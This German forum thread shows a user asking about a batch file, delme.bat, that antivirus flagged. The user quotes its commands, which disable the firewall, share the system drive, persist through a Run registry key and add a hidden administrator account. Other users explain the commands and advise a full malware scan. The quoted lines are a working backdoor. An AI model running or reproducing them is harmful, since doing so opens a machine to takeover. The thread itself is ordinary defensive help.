ComputerBase Menü
Aktuelles

delme.bat

S

schmidmi

Lt. Commander
Registriert
Feb. 2007
Beiträge
1.823
Antivir meldete mir heute eine Datei unter C:\Windows namens delme.bat.

Ich habe sie mal mit dem Editor geöffnet und sie enthält mehrere für mich komische Anweisungen. Z.B.:

netsh firewall set opmode mode=disable

NET SHARE system=%SYSTEMDRIVE% /UNLIMITED

REG ADD HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v Eksplorer /t REG_SZ /d %windir%\delme.bat /f

net user USER PASSWORD /add
net user USER PASSWORD
net localgroup administrators USER /add

Was kann das sein?
 
das is eine batchdatei die die (win) firewall ausschaltet,
einen neuen user anlegtzugriffe auf die systempartition ändert
und sicherstellt und die batchdatei in die registry schreibt, um sie nach jedem ssystemstart zu starten.
 
jap. ziemlich schädlich das ganze. Kein Wunder dass Avira alarm schlägt. Wenn du danach googelst findest du viele Seiten/Threads die das Thema behandeln.
z.B. [Link entfernt]
http://www.trojaner-board.de/49549-mein-pc-macht-er-will.html

Davon mal abgesehen dass der Name delme "Delete me" oder sowas auch schon vielaussagend ist. Lass deine Kiste mal komplett nach Viren, Spyware und dem ganzen krempel scannen
 
Zuletzt bearbeitet von einem Moderator:
Phoebus Ryan schrieb:
Wenn du danach googelst findest du viele Seiten/Threads die das Thema behandeln.
z.B. [Link entfernt]
Zum Vergrößern anklicken....
Eben und weil die Leute nur Googeln, wenn sie nach Lösungen suchen, kommen sie auf Seiten mit dubiosen Ruf. :rolleyes:
Das beste Beispiel gibst du hier schon mal ab. Wenn man das Zeug auf der Seite runter lädt, kommt noch mehr Spyware und sonstiges Zeug dazu.
http://www.mywot.com/de/scorecard/spywareremove.com
 
Zuletzt bearbeitet von einem Moderator:
man sollte wot nicht überbewerten.
die angesprochene seite ist eine von diversen aus dem enigma software-paralleluniversum, um den spyhunter-schund an den mann zu bringen, aber nicht gefährlich.
This site is a division of Enigma Software Group USA, LLC and is managed by Four Winds Marketing, LLC., an authorized reseller of SpyHunter.
Zum Vergrößern anklicken....
*
ich habe mehrmals darum gebeten, meine anleitung hinsichtlich strukturiertem vorgehen anzupinnen, aber anscheinend ist so etwas hier nicht erwünscht.:(
 
Du musst dich einloggen oder registrieren, um hier zu antworten.

Ähnliche Themen

A
Windows 10 Defender deaktiviert?
Antworten
17
Aufrufe
2.456
Winterday
Winterday
KingStylesDE
Batch Datei als Admin ausführen funktioniert nicht
Antworten
17
Aufrufe
4.599
KingStylesDE
KingStylesDE
Karutahi
Raspberry => Samba => Win 11
Antworten
4
Aufrufe
1.679
Karutahi
Karutahi
R
SMB Samba Server mit iPhone verbinden
Antworten
15
Aufrufe
4.763
raffi_xd60
R
Jossy82
Selbst gehosteter Wrath of the Lichking Server mit Bots
2
Antworten
25
Aufrufe
8.702
Jossy82
Jossy82
Zurück
Oben

Willkommen auf ComputerBase!

Mit Werbung weiterlesen

Besuche ComputerBase wie gewohnt mit Werbung und Tracking. Die Zustimmung ist jederzeit widerrufbar.

Details im Privacy Center und in der Liste unserer Partner. Ein Widerruf ist möglich in der Datenschutzerklärung.

… oder ComputerBase Pro bestellen

Nutze ComputerBase ohne Werbebanner, Video-Ads und Werbetracking schon für 4 €/Monat oder 36 €/Jahr.

Mehr zu ComputerBase Pro

Bereits Pro-Nutzer? Hier anmelden.

Tracking: Wir und unsere 170 Partner verarbeiten personenbezogene Daten, indem wir mit auf Ihrem Gerät gespeicherten Informationen (z. B. eindeutige Kennungen in Cookies) ein Nutzungsprofil erstellen, um z. B. Anzeigen zu personalisieren. Verarbeitungszwecke: Genaue Standortdaten und Abfrage von Geräteeigenschaften zur Identifikation, Informationen auf einem Gerät speichern und/oder abrufen, Personalisierte Anzeigen und Inhalte, Anzeigen- und Inhaltsmessungen, Erkenntnisse über Zielgruppen und Produktentwicklungen.

Impressum Kontakt Datenschutz